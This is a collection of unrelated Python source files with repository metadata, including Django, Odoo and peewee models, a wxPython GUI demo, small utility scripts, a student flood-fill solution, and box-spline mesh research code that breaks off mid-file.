refs/heads/master
2020-06-30T00:25:46.968308
2017-07-17T16:15:44
2017-07-17T16:15:44
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,549
py
#!/usr/bin/env python #-*- coding:utf-8 -*- import requests import sys import simplejson as jsmod def main(args): # http://119.254.100.75:8080/v1/query ip = "119.254.100.75" url = "http://%s:8080/v1/query" % (ip) ret = requests.post(url, data={ # "cn": "重庆", "cn": "aaa", }) obj = jsmod.loads(ret.text, encoding='utf-8') # read as below # { # u'weather1d': u'02\u65e520\u65f6,n01,\u591a\u4e91,13\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,0|02\u65e523\u65f6,n02,\u9634,12\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,0|03\u65e502\u65f6,n02,\u9634,11\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,0|03\u65e505\u65f6,n02,\u9634,11\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,0|03\u65e508\u65f6,d02,\u9634,11\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,3|03\u65e511\u65f6,d02,\u9634,12\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,3|03\u65e514\u65f6,d02,\u9634,13\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,3|03\u65e517\u65f6,d02,\u9634,13\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,3|03\u65e520\u65f6,n02,\u9634,13\u2103,\u65e0\u6301\u7eed\u98ce\u5411,\u5fae\u98ce,0', # u'ret_code': 0 # } if obj["ret_code"] == 0: weather1d = obj["weather1d"] # print weather1d weather_info = weather1d.split("|") for hourly_weather in weather_info: print hourly_weather else: err = obj["err"] print "err when get weather: ", err if __name__ == "__main__": main(sys.argv[1:])
7d21bd6490d491584a25d9471d4e8fa2af419c32
401bf511c4791f9f582ef51e82ceb63c69d31de6
/src/revolio/serializable/__init__.py
9f43814bf7635637096ede509eb80792220560a2
[]
no_license
BenBlaisdell/revolio
ce312332bc13b97ad87d195045d7e8ea74a3da99
93d998f1816dee881e71d576574ff9b3bcd9d90c
refs/heads/master
2022-12-09T08:11:10.936934
2018-04-06T14:44:45
2018-04-06T14:44:45
86,363,426
0
0
null
null
null
null
UTF-8
Python
false
false
123
py
from revolio.serializable import fields from revolio.serializable.serializable import Serializable, KeyFormat, column_type
723404b6f6ded8abfd07d6f264cc4a03cd885cc2
025ed7b41e7bb4204916ed0160bc16935999f94f
/library-backend/book/admin.py
f795aeeeec53ddeec8bc7b5898ad52df53ddd2dc
[]
no_license
luhc228/SmartLibrary
deec554778e27b1ede3ad86be52d1f293331be5e
075814058a721a51b753216908e13995e3d1e819
refs/heads/master
2020-04-30T14:18:47.274452
2019-03-21T07:07:19
2019-03-21T07:07:19
176,887,300
0
0
null
null
null
null
UTF-8
Python
false
false
174
py
from django.contrib import admin from .models import Book, NewBook, RecommendBook admin.site.register(Book) admin.site.register(NewBook) admin.site.register(RecommendBook)
8531ff31b3ebfe39de4f571d391d90a7f0ade912
9795dda526b3436de26c73353021a0651a6762f9
/example/wxpython/图形按钮组件封装测试.py
d53fbaf9305e953572ac050f909f31e672a223de
[ "Apache-2.0" ]
permissive
brucekk4/pyefun
891fc08897e4662823cf9016a680c07b31a8d5be
1b4d8e13ee2c59574fded792e3f2a77e0b5e11a2
refs/heads/master
2023-07-10T03:54:11.437283
2021-08-23T17:46:19
2021-08-23T17:46:19
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,178
py
import pyefun.wxefun as wx class 窗口1(wx.窗口): def __init__(self): self.初始化界面() def 初始化界面(self): #########以下是创建的组件代码######### wx.窗口.__init__(self, None, title='易函数视窗编程系统', size=(600, 369), name='frame', style=wx.窗口边框.普通可调边框& ~(wx.MAXIMIZE_BOX)) self.容器 = wx.容器(self) self.Centre() self.窗口1 = self self.图形按钮1 = wx.图形按钮(self.容器, size=(330, 97), pos=(237, 93), bitmap=None, label='图形按钮') self.图形按钮1.正常图片 = r'.\resources\hh1.png' self.图形按钮1.焦点图片 = r'.\resources\hh2.png' self.图形按钮1.按下图片 = r'.\resources\hh3.png' self.图形按钮1.禁止图片 = r'.\resources\hh4.png' self.图形按钮1.显示方式 = r'缩放图片' self.图形按钮1.图片缩放大小 = (32, 32) self.图形按钮1.绑定事件(wx.事件.被单击, self.图形按钮1_被单击) self.按钮1 = wx.按钮(self.容器, size=(161, 44), pos=(35, 197), label='按钮') self.按钮1.绑定事件(wx.事件.被单击, self.按钮1_被单击) self.编辑框1 = wx.编辑框(self.容器, size=(149, 43), pos=(26, 21), value='', style=wx.TE_LEFT) self.超级链接框1 = wx.超级链接框(self.容器, size=(138, 37), pos=(225, 21), label='超级链接框321', url='',style=wx.adv.HL_DEFAULT_STYLE) self.超级链接框1.链接地址 = r'https://www.baidu.com/' #########以上是创建的组件代码########## #########以下是组件绑定的事件代码######### def 图形按钮1_被单击(self,event): print("图形按钮1_被单击") def 按钮1_被单击(self,event): print("按钮1_被单击") #########以上是组件绑定的事件代码######### class 应用(wx.App): def OnInit(self): self.窗口1 = 窗口1() self.窗口1.Show(True) return True if __name__ == '__main__': app = 应用() app.MainLoop()
c68569999404cf2d9c7dc35dfaf1c7cd5618998e
79d55c2d9c6fd7fe5a3b6a1b12c4ff5426e6a505
/venv/Scripts/easy_install-script.py
300c999a5cbe9930fd0dc10a79ef4c08bae4c46b
[]
no_license
Mbraun5/Pac-Portal
f63a33070d17f0aecab2227789909dc135ca943c
4dd48d799f3494a3924605c65ce6f458993b77f6
refs/heads/master
2020-04-02T01:38:07.100864
2018-11-01T00:47:17
2018-11-01T00:47:17
153,866,921
0
0
null
null
null
null
UTF-8
Python
false
false
469
py
#!"C:\Users\Matthew\Desktop\Pycharm Programs\Pacman Portal\venv\Scripts\python.exe" # EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install' __requires__ = 'setuptools==39.1.0' import re import sys from pkg_resources import load_entry_point if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit( load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')() )
2366c4dccff48536bca68ac6e560f8df0e8a899f
be77678a23b1d44c7bc0ca87be919d84590b19cd
/wymarzony_pies/migrations/0011_auto_20200915_1235.py
2946a68153c8ac2eba0266a9f8a9665612309cbb
[]
no_license
Arkadiusz0202/Reservation_system_wymarzony_pies
42d1d7dbf3ae48836473a05957b36424fbed2358
21c09b069a2d78073d26316e7978de3a44dca6c5
refs/heads/master
2022-12-17T15:17:01.651347
2020-09-15T10:50:45
2020-09-15T10:50:45
294,917,575
0
0
null
null
null
null
UTF-8
Python
false
false
565
py
# Generated by Django 3.1.1 on 2020-09-15 10:35 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('wymarzony_pies', '0010_remove_reservation_customer'), ] operations = [ migrations.AlterField( model_name='location', name='open_form', field=models.CharField(max_length=128), ), migrations.AlterField( model_name='location', name='open_to', field=models.CharField(max_length=128), ), ]
1e54fceed8c88b5f717dd20801e59eee679cba41
7a738f6c8ae8c4004161a4c3f72120594d48cc07
/backend/projects/models/category.py
71e6e390344dc23bb2041e0fb39dc3dfbc07c06b
[ "Apache-2.0" ]
permissive
hndoss/manos-bondadosas
277bcefd1307cfbcd76bfc70cd0846eb83e9a15e
2d6eaee63ef3d90f26c7f4862b31f6635eb9dee3
refs/heads/staging
2020-12-27T18:54:17.372304
2020-07-17T02:41:05
2020-07-17T02:41:05
238,011,718
0
0
Apache-2.0
2020-07-17T03:05:55
2020-02-03T16:37:04
JavaScript
UTF-8
Python
false
false
367
py
from django.db import models class Category(models.Model): category = models.CharField(blank=False, primary_key=True, max_length=30) description = models.CharField(blank=False, null=True, max_length=60) def __str__(self): return self.category class Meta: verbose_name = 'Project Category' verbose_name_plural = 'Categories'
2f43c32851336a99b0f4e75ce5945c65d261ebec
9bb4f38b400540dee75294a1f48bcb1128f5ecaf
/db/peewee/Students.py
ac9c53de4f43c3b8c509fa7209d063eb55669735
[]
no_license
andresmontoyab/Python
43184a01f4e168918ee0499cfc4e989a318de3f5
713840ba1bbd64eb8d5549c03c2c7f7e18261017
refs/heads/main
2023-05-12T10:28:50.273930
2021-05-29T00:20:22
2021-05-29T00:20:22
333,450,765
0
0
null
null
null
null
UTF-8
Python
false
false
1,223
py
from peewee import * db = SqliteDatabase('students.db') #In order to map object to models we must create a class that extends from peewee Model class Student(Model): username = CharField(max_length=255, unique=True) points = IntegerField(default=0) class Meta: #This meta class help peewee to undersntand to which db belongs this Model database = db students = [ { 'username': 'Andres', 'points': 7 }, { 'username': 'Juan', 'points': 9 }, { 'username': 'Gelen', 'points': 10 }, { 'username': 'Mari', 'points': 10 } ] def add_students(): for student in students: try: Student.create(username=student['username'], points=student['points']) except IntegrityError: print("Student with username {} was already created".format(student['username'])) def top_student(): top_student = Student.select().order_by(Student.points.desc()).get() return top_student if __name__ == '__main__': db.connection() db.create_tables([Student], safe=True) add_students() #top_student() print(top_student().username)
ac7938005be2abd036a827eb5074e581c46cf254
13b1ece281a1eaa0cac2706c14f1d4c190f73c2b
/Assignment 3/flood_fill_solutions/BMC201955/BMC201955.py
149f4a1fda7450ab05aa6732a5ca52691108105c
[]
no_license
bhi5hmaraj/APRG-2020
0c995f79cc50108956d1bd0ceed8d7cb6d96f34e
7e11c14a02d48d52b547696fc930f38c586ce0da
refs/heads/master
2022-07-17T09:41:58.947321
2020-05-21T12:34:46
2020-05-21T12:34:46
236,176,133
0
0
null
null
null
null
UTF-8
Python
false
false
1,177
py
import sys lst = list(map(int,input().split(" "))) lst1 = list(map(int,input().split(" "))) (m,n) = (lst[0],lst[1]) (p,q) = (lst1[0],lst1[1]) matrix = [] for i in range(n): matrix.append(list(map(int,input().split(" ")))) lsst = [[0]*m]*m for i in range(n): a = matrix[i][0] b = matrix[i][1] lsst[a-1][b-1] = 2 lsst[p-1][q-1] = 1 def func(lsst1): m1 = len(lsst1) for i in range(m1): for j in range(m1): if lsst1[i][j] == 1: if ((i-1) in range(m1)) and (lsst1[(i-1)][j] == 0): lsst1[(i-1)][j] = 1 elif ((i+1) in range(m1)) and (lsst1[(i+1)][j] == 0): lsst1[(i+1)][j] = 1 elif ((j-1) in range(m1)) and (lsst1[i][(j-1)] == 0): lsst1[i][(j-1)] = 1 elif ((j+1) in range(m1)) and (lsst1[i][(j+1)] == 0): lsst1[i][(j+1)] = 1 return(lsst1) for i in range(m): for j in range(m): if lsst[i][j] == 0: lsst = func(lsst) t = "Y" for i in range(m): for j in range(m): if lsst[i][j] == 0: t = "N" break sys.stdout.write(t)
e6e263c361724887317befacbe85f8dd61830b20
30200bf7122c0bb2777db5df451174378493e984
/tools/run-after-git-clone
3afe5cf77802ddbeb695af2a5a6afb5c40ddcaae
[ "LicenseRef-scancode-unknown-license-reference", "Apache-2.0" ]
permissive
rjanser/fastai_pytorch
7310320d6ef24a47fb9035bf8584b23511eb0261
ffef0b405292d0a5dc14bf1c0c21d3763f2b4646
refs/heads/master
2020-03-30T06:42:22.102529
2018-09-29T14:33:08
2018-09-29T14:33:08
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,000
#!/usr/bin/env python # if you're a fastai developer please make sure you do this: # # git clone https://github.com/fastai/fastai_pytorch # cd fastai_pytorch # tools/run-after-git-clone # import subprocess, os from pathlib import Path def run_script(script): cmd = f"python {script}" #print(f"Executing: {cmd}") result = subprocess.run(cmd.split(), shell=False, check=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if result.returncode != 0: print(f"Failed to execute: {cmd}") if result.stdout: print(f"{result.stdout.decode('utf-8')}") if result.stderr: print(f"Error: {result.stderr.decode('utf-8')}") # make sure we are under the root of the project cur_dir = Path(".").resolve().name if (cur_dir == "tools"): os.chdir("..") path = Path("tools") # facilitate trusting of the repo-wide .gitconfig run_script(path/"trust-origin-git-config") # facilitate trusting notebooks under docs_src run_script(path/"trust-doc-nbs")
fdaf8ca8fbc75704adf287f7fed5dfe185c3a435
434a2de27730f42a4d632e9c810324e35f893cd4
/model/base.py
81b36e5a062720d3ecd01cf234b284f70226352b
[]
no_license
AcademiaSinicaNLPLab/LJ2M
f49ebd55dc777271727a61faecb13c80a5c65c9c
a1dae7e2bb7de03322c5faeabfa8c15d4d476c5b
refs/heads/master
2020-08-08T20:08:15.493660
2015-09-05T02:59:43
2015-09-05T02:59:43
34,600,097
0
0
null
null
null
null
UTF-8
Python
false
false
621
py
import abc class LearnerBase: __metaclass__ = abc.ABCMeta #def __init__(self): # raise NotImplementedError("This is an abstract class.") @abc.abstractmethod def set(self, X, y, feature_name): """ set the training X, y, and feature name string """ pass @abc.abstractmethod def train(self, **kwargs): pass @abc.abstractmethod def predict(self, X_test, y_test, **kwargs): pass @abc.abstractmethod def dump_model(self, file_name): pass @abc.abstractmethod def load_model(self, file_name): pass
0750700020ee9d97d76ac24dad19ec69e89de280
ebd3ade52cc1122830e2bc07700b83ff0339c7cf
/ufc_live/account_extend/models/models.py
0748eb41fbf98211927b3f15ef9ee53500769d00
[]
no_license
Guobower/odoo-project-data
8596031646d8ba6ed301f7d745f9125bb4d7d99f
1f6ce801b4113aad18b3ea9a380b5ad257bdbe34
refs/heads/master
2020-04-07T07:41:02.796468
2017-12-27T17:39:40
2017-12-27T17:39:40
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,759
py
from odoo import models, fields, api class account_extend(models.Model): _inherit = 'account.invoice' bill_no = fields.Char(string="Bill No") frm_bill_no = fields.Char(string="From Bill No") province = fields.Char(string="Province") branch = fields.Many2one('branch',string="Branch") bill_num = fields.Char(string="To Bill No") m_tons = fields.Float(string="M Tons") # summary_id = fields.Many2one('summary.ffc') # ==================punching branch in account.move on validate button using fun super======== # ==================punching branch in account.move on validate button using fun super======== @api.multi def action_invoice_open(self): new_record = super(account_extend, self).action_invoice_open() JournalEntry = self.env['account.move'].search([('name','=',self.number)]) if self.branch: JournalEntry.branch = self.branch.id return new_record class move_extend(models.Model): _inherit = 'account.move' branch = fields.Many2one('branch',string="Branch") ufc_id = fields.Many2one('ufc.auto') class journal_extend(models.Model): _inherit = 'account.journal' branch = fields.Many2one('branch',string="Branch") class bank_extend(models.Model): _inherit = 'account.bank.statement' branch = fields.Many2one('branch',string="Branch") # ===================showing branch of relevant journal in cash book========================== # ===================showing branch of relevant journal in cash book========================== @api.onchange('journal_id') def get_branch(self): records = self.env['account.journal'].search([('id','=',self.journal_id.id)]) self.branch = records.branch.id class bank_extend(models.Model): _inherit = 'account.bank.statement.line' branch = fields.Many2one('branch',string="Branch") # =========================punching branch in journal enteries using fun super=============== # =========================punching branch in journal enteries using fun super=============== @api.multi def process_reconciliation(self,data,uid,id): new_record = super(bank_extend, self).process_reconciliation(data,uid,id) records = self.env['account.bank.statement'].search([('id','=',self.statement_id.id)]) journal_entery = self.env['account.move'].search([], order='id desc', limit=1) journal_entery.branch = records.branch.id return new_record class ufc_user_extend(models.Model): _inherit = 'res.users' Branch = fields.Many2one ('branch',string="Branch") class branch(models.Model): _name = 'branch' Address = fields.Char(string="Address") name = fields.Char(string="Name") Phone = fields.Char(string="Phone") Mobile = fields.Char(string="Mobile") ptcl = fields.Char("Ptcl")
ca941ddddb7fc347c0a254966760fb0239e0ba73
96ea8a4b241794f0eab2e34cbd75124dac26f2ac
/users/migrations/0002_auto_20200628_1146.py
76855fd7b14a9ccf3149ea2cd030b856d34bdfce
[]
no_license
magloirend/budget_tracker
a1cd53aa9ad2a99e1fd1b8ee445bce2f98136806
4a66bc3d516f8116c20aa11399f25e618e74f06e
refs/heads/master
2022-11-18T04:02:58.427416
2020-07-13T13:03:38
2020-07-13T13:03:38
null
0
0
null
null
null
null
UTF-8
Python
false
false
677
py
# Generated by Django 3.0.7 on 2020-06-28 11:46 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('users', '0001_initial'), ] operations = [ migrations.AddField( model_name='user', name='organization_owner', field=models.BooleanField(default=False), ), migrations.AlterField( model_name='user', name='organization', field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='users.Organization'), preserve_default=False, ), ]
502b63b465725af09cddcbad8d731b28c955743a
c31931fa13cb469b7cc10df3bb87dc308d241fa1
/game/core/systems/dialogue/__init__.py
4c39a8a5317135ee08de407920c0e44ea555de4e
[]
no_license
darrickyee/ue-pygame
53158a98df1dddbd2efdd0132c82eff523b54413
9be0a519aa8de455fdb54bddad7e5f773fe86d75
refs/heads/master
2021-02-09T01:24:15.015941
2020-12-03T03:50:32
2020-12-03T03:50:32
244,221,961
0
0
null
null
null
null
UTF-8
Python
false
false
79
py
from .system import DialogueSystem from .loader import loadNodes, loadDlgGraph
071e915b9f4f0fb968ac51115b47470507899e6e
89a3cb6e0625e7ae8d3d4c12bf5214557d344059
/Report_[2017-05-13]_Box_Spline_Initial_Analysis/box_mesh[6-8-2017 max-side-len verbose].py
91afd0bec85321cdbf04efb580f2f16d4754acf1
[]
no_license
tchlux/VarSys
e5adc802bbf8149bd3584d350bb429c24d4cbdd8
313a3029d838520d30ce960fa56a897ba9180037
refs/heads/master
2023-07-20T10:58:34.901566
2020-09-22T15:37:45
2020-09-22T15:37:45
108,617,499
0
0
null
2023-07-06T21:13:39
2017-10-28T03:44:31
null
UTF-8
Python
false
false
23,062
py
# WARNING: This 'max-side-len' box mesh construction code cannot # handle data with shared x or y coordinates (allowing for # more than 2*dimension neighbors) # WARNING: This 'max-side-len' box mesh construction code does not # properly expand into higher dimension than x \in # R^2. During the 'growing' phase, all dimensions need to be # checked for expansion, not just the current study. import numpy as np from plotly_interface import * import os # Pre: "x" is a 1 x N dimensional numpy array or list in the range [0,1] # Post: The value of the quadratic box spline in N dimensions # is computed for the given point. def linear(x): x *= 2 # Compute the box spline function value for the x-coordinate based # on which region of the box that it is in func_val = 1.0 for d in range(len(x)): if (0 <= x[d] < 1): func_val *= x[d] elif (1 <= x[d] < 2): func_val *= (2 - x[d]) return func_val # Pre: "x" is a 1 x N dimensional numpy array or list in the range [0,1] # Post: The value of the quadratic box spline in N dimensions # is computed for the given point. def quadratic(x): x *= 3 # Compute the box spline function value for the x-coordinate based # on which region of the box that it is in func_val = 1 / 2**(x.shape[0]) for d in range(len(x)): if (0 <= x[d] < 1): func_val *= x[d]**2 elif (1 <= x[d] < 2): func_val *= -(2*x[d]**2 - 6*x[d] + 3) elif (2 <= x[d] <= 3): func_val *= (x[d] - 3)**2 return func_val # Pre: "x" is a 1 x N dimensional numpy array or list in the range [0,1] # Post: The value of the classic cubic box spline in N dimensions # is computed for the given point. def cubic(x): x *= 4 # Compute the box spline function value for the x-coordinate based # on which region of the box that it is in func_val = 1 / (2*3**(x.shape[0])) for d in range(len(x)): if (0 <= x[d] < 1): func_val *= (x[d]**3) elif (1 <= x[d] < 2): func_val *= (4 - 12*x[d] + 12*x[d]**2 - 3*x[d]**3) elif (2 <= x[d] < 3): func_val *= (-44 + 60*x[d] - 24*x[d]**2 + 3*x[d]**3) elif (3 <= x[d] <= 4): func_val *= (4-x[d])**3 return func_val # Pre: "x" is a 1 x N dimensional numpy array or list # "center" is a 1 x N dimensional numpy array or list # representing the bottom left (in cartesian coordinates) of the box # "[.*]_width" is the set of widths of this box spline in the # less than center and greater than center directions # "func" is the box function to use assuming we have x scaled # into the unit cube # Post: The value of the classic quadratic box spline in N dimensions # is computed for the given point. def compute_box(x, center=None, low_width=None, upp_width=None, func=linear): # Initialize center and width of box 3 if type(center) == type(None): center = np.ones(x.shape)/2 if type(low_width) == type(None): low_width = np.ones(x.shape)/2 if type(upp_width) == type(None): upp_width = np.ones(x.shape)/2 # Make sure we don't modify the input x value when evaluating x = x.copy() # Scale the point to be in the space where the box is the unit cube x -= center x = np.where(x < 0, (1 - x / low_width)/2, (1 + x / upp_width)/2) # If the point is outside of the box, return 0 if (min(x) <= 0) or (max(x) >= 1): return 0 # Return the final function value at that point return func(x) # Function for storing a center and width associated with a quadratic # box spline as well as evaluating the box spline class Box: box_count = -1 # Used for generating ID numbers # Organize the necessary values for the box def __init__(self, center, low_width=None, upp_width=None, func=linear, width_scalar=1.0): # Initialize lower and upper widths if they are not given if type(low_width) == type(None): low_width = np.ones(center.shape) * float('inf') if type(upp_width) == type(None): upp_width = np.ones(center.shape) * float('inf') # Get an id for this box self.id = Box.box_count = Box.box_count + 1 self.box_func = func self.width_scalar = width_scalar self.center = center self.low_width = low_width self.upp_width = upp_width # Returns true if this box contains "pt" def contains(self, pt): return (np.all(self.center-self.low_width < pt) and np.all(self.center+self.upp_width > pt)) # String representation of this box def __str__(self): string = "ID: %s\n"%self.id string += " center: %s\n"%self.center string += " lower: %s\n"%(self.center - self.low_width) string += " upper: %s\n"%(self.center + self.upp_width) return string # Evaluates the underlying box function for this box at a given point def __call__(self, x): # Return the computed quadratic box spline evaluation return compute_box(x, self.center, self.low_width*self.width_scalar, self.upp_width*self.width_scalar, self.box_func) # Function for creating a surface over a region defined by the # axis-aligned bounding box of all data points class BoxMesh: def __init__(self, box_func=quadratic, width_scalar=1.0): self.boxes = [] self.values = [] self.box_func = box_func self.width_scalar = width_scalar # Given a set of control points, this constructs the maximum box # mesh, that is to say the boxes around each control point have # the largest minimum side length possible. # Without computing max-side-length boxes: O(n^2*log(n) * d ) # With computing max-side-length boxes: O(n^3 * d^2) def add_points(self, control_points, max_side_length_box=False): self.values = control_points[:,-1] control_points = control_points[:,:-1] # Cycle through the box centers and construct the max-boxes for i,(center,value) in enumerate(zip(control_points,values)): box = Box(center, func=self.box_func, width_scalar=self.width_scalar) # Holder for candidate boundary points for this box candidates = list(range(len(control_points))) candidates.pop(i) candidates.sort(key = lambda c: np.max(abs(center - control_points[c]))) # Holder for the neighbors of this box (on its edge) neighbors = [] # Cycle through and shrink the box, touching immediate neighbors for c in candidates: if not box.contains(control_points[c]): continue other_pt = control_points[c] # handle choosing a split dimension normally split_dim = np.argmax(abs(center - other_pt)) # Shrink 'box' along that best dimension width = center[split_dim] - other_pt[split_dim] if width < 0: box.upp_width[split_dim] = min(box.upp_width[split_dim],-width) else: box.low_width[split_dim] = min(box.low_width[split_dim], width) # Update the neighbors for the new box neighbors.append( [split_dim,c] ) # Skip the rest of the computations if we don't need max boxes if not max_box: self.boxes.append(box) continue # Constructing the Box with Largest Minimum Side Length #=============================================================== print() print() print("========================================") print() print(box) # Temporary variable names dim = control_points.shape[1] num_pts = control_points.shape[0] min_bounds = np.min(control_points, axis=0) max_bounds = np.max(control_points, axis=0) # Try and find a larger minimum side length, once no # improvement can be made, we must have the max-box for _ in range(num_pts): # Adjust the side lengths, ignoring infinities low_width = np.where(box.low_width < float('inf'), box.low_width, box.center - min_bounds) upp_width = np.where(box.upp_width < float('inf'), box.upp_width, max_bounds - box.center) side_lengths = low_width + upp_width # Get the smallest side and its length min_side = np.argmin(side_lengths) min_len = np.min(side_lengths) # Get the current neighbors on this minimum side to_use = [n for n in neighbors if n[0] == min_side] print("--------------------------") print() print("neighbors: ",neighbors) print("low_width: ",low_width) print("upp_width: ",upp_width) print("min_side: ",min_side) print("min_len: ",min_len) print("to_use: ",to_use) # Cycle through all dimensions to shorten on for d in range(dim): # Don't try and shorten the min side if d == min_side: continue # Holder for knowing if we've improved the box improved = False # At most 2 on non-gridded data for pt in to_use: print() print("Trying to use dimension %i, point %i"%(d,pt[1])) # Get this neighboring point neighbor_pt = control_points[pt[1]] # Shorten the existing box on dimension d to stop at this neighbor if neighbor_pt[d] < center[d]: print("Shrinking the lower width along",d) old_width = (box.low_width, box.low_width[d]) box.low_width[d] = center[d] - neighbor_pt[d] old_neighbor = [n for n in neighbors if ( control_points[n[1],d] <= neighbor_pt[d])] else: print("Shrinking the upper width along",d) old_width = (box.upp_width, box.upp_width[d]) box.upp_width[d] = neighbor_pt[d] - center[d] old_neighbor = [n for n in neighbors if ( control_points[n[1],d] >= neighbor_pt[d])] # Make sure that the point that is being # reused isn't included in the neighbors to remove if pt in old_neighbor: old_neighbor.remove(pt) # Try and grow the box in both direction of the # min side length (we can now squeeze through) for growing in [box.low_width, box.upp_width]: old_min_side = growing[min_side] growing[min_side] = float('inf') new_neighbor = None # Identify the new boundary for the box for c in candidates: if box.contains(control_points[c]): # If there isn't currently a new # neighbor, or this point is # closer than the current neighbor if ((new_neighbor == None) or ( abs(center[min_side] - control_points[c][min_side]) < abs(center[min_side] - control_points[new_neighbor[1]][min_side]) )): growing[min_side] = abs(center[min_side] - control_points[c][min_side]) new_neighbor = [min_side,c] # Adjust the side lengths, ignoring infinities low_width = np.where(box.low_width < float('inf'), box.low_width, box.center - min_bounds) upp_width = np.where(box.upp_width < float('inf'), box.upp_width, max_bounds - box.center) side_lengths = low_width + upp_width print("low_width: ",low_width) print("upp_width: ",upp_width) print("side_lengths: ",side_lengths) print() # Identify the new minimum dimension of the box if np.min(side_lengths) > min_len: print("Improved!") print("new_neighbor: ",new_neighbor) print(box) # If we've increased the minimum side length improved = True # Formally adjust the modified neighbor boundary pt[0] = d # Add the new neighbor that was encountered if new_neighbor: print("Found new neighbor: ", new_neighbor) neighbors.append(new_neighbor) # Remove the now obselete neighbors on this dimension for to_remove in old_neighbor: print("Removing neighbor: ", to_remove) neighbors.remove(to_remove) old_neighbor = [] else: print("Not improved.") # Otherwise, revert changes old_width[0][d] = old_width[1] growing[min_side] = old_min_side # Stop cycling boundary checks when successfully improved if improved: break print() # Improvement found, break out of this iteration if improved: break else: # If we've checked all dimensions and no # improvement could be found, then we are done! break # We have now found the box with the largest minimum side length self.boxes.append(box) # Store the value at the center of a box (same for all boxes) self.box_center_value = self.boxes[0](self.boxes[0].center) # Calculate the lipschitz constant for this data self.calculate_lipschitz() # Stores the lipschitz constant of this data set in self.lipschitz def calculate_lipschitz(self): self.lipschitz = 0 # Calculate the lipschitz constant of the data for (b,v) in zip(self.boxes,self.values): for (other_b,other_v) in zip(self.boxes,self.values): if (v == other_v): continue dist = np.sqrt(np.sum((b.center - other_b.center)**2)) self.lipschitz = max(self.lipschitz, abs(v - other_v) / dist) return self.lipschitz # Calculate and return the plus/minus error at a given x-value def error(self, x): # Get the surface value surf_val = self(x) # Initialize holder for plus and minus error error = [float('inf'),float('inf')] for (b,v) in zip(self.boxes, self.values): dist = np.sqrt(np.sum( (b.center - x)**2 )) error[0] = min(error[0], abs(v - dist*self.lipschitz - surf_val)) error[1] = min(error[1], abs(v + dist*self.lipschitz - surf_val)) # Remove all infinities from error while float('inf') in error: error[error.index(float('inf'))] = 0 # Return the plus and minus error at a given data point return error # Evaluate all of the box splines and return the final function # value at the requested point. def __call__(self, x): # # If we're using a linear function, calculate lagrange-style interpolation value # if (self.box_func == linear and self.width_scalar == 1.0): # value = 0 # for (b,v) in zip(self.boxes, self.values): # box_val = b(x) # value += box_val * v / self.box_center_value # return value # Otherwise, use the NURBS approach to smoothing numerator = denominator = 0 # Calculate the numerator and denominator for (b,v) in zip(self.boxes, self.values): box_val = b(x) numerator += box_val * v denominator += box_val # Adjust for points outside of the region if denominator == 0: print("WARNING: Out of the range of all boxes.") return None # Return the evaluation of all box splines for this point return numerator / denominator # ======================= # Plotting Code # ======================= # Produces a list of the points that define the corners of the given # box, when the width is infinity, uses min_max def box_corners(box, low_upp): points = [] bits = [0] * len(box.center) for d in range(2*len(bits)): bit_index = d % len(bits) bits[bit_index] = (bits[bit_index] + 1) % 2 # Scale infinite sides to be just wide of the boundary points low_width = np.where(abs(box.low_width) != float('inf'), box.low_width, low_upp[0]) upp_width = np.where(abs(box.upp_width) != float('inf'), box.upp_width, low_upp[1]) # Add the next corner points += [[ box.center[i] + (-low_width[i] if bits[i] else upp_width[i]) for i in range(len(bits)) ]] return points # Draw a box in a 2D plotly plot def draw_2D_box(plot, box, min_max): # Generate the absolute lower and upper plotting bounds low_upp = [[box.center[i] - min_max[0][i], min_max[1][i] - box.center[i]] for i in range(len(box.center))] low_upp = np.array(low_upp).T # Get the boundary points of the box corners = box_corners(box, low_upp) corners.append(corners[0]) corners = np.array(corners) # Add the box to the plot opacity = 0.7 plot.color_num += 1 color = plot.color(plot.color_num, alpha=opacity) center = list(box.center) plot.add("%s boundary"%(box.id), *list(zip(*corners)), mode='lines', color=color, opacity=opacity) return color # Draw the boundary boxes for a given mesh def draw_boxes_2D(plot, mesh): min_max_x = (min(b.center[0] for b in mesh.boxes), max(b.center[0] for b in mesh.boxes)) min_max_y = (min(b.center[1] for b in mesh.boxes), max(b.center[1] for b in mesh.boxes)) # Add an extra buffer to the edges extra = (0.1 * (min_max_x[1] - min_max_x[0]), 0.1 * (min_max_y[1] - min_max_y[0])) min_max_x = (min_max_x[0] - extra[0], min_max_x[1] + extra[0]) min_max_y = (min_max_y[0] - extra[1], min_max_y[1] + extra[1]) min_max = list(zip(min_max_x, min_max_y)) colors = [] # First, draw the borders of all of the boxes for box in mesh.boxes: colors.append( draw_2D_box(plot, box, min_max) ) # Draw the centers second in order to make them on 'top' of the borders for box,color in zip(mesh.boxes, colors): plot.add("%s center"%(box.id), *[[v] for v in box.center], show_in_legend=False, marker_size=5, symbol='square', color=color) # ==================================================== # Testing the code for generating box meshes # ==================================================== if __name__ == "__main__": use_max_box = True random_points = True normalize_points = False num_points = 3 func = linear size = 1.0 plot_range = [0.01,0.99] #[-0.2, 1.2] plot_points = 1000 # fun = lambda x: (x[0]-num_points/3)*(x[1]-num_points/2)**2 fun = lambda x: np.cos(x[0]) * np.sin(x[1]) # Generate testing points in a grid pattern points = np.meshgrid(range(num_points), range(num_points)) points = np.array([points[0].flatten(), points[1].flatten()]).T if random_points: # Generate testing points randomly spaced points = 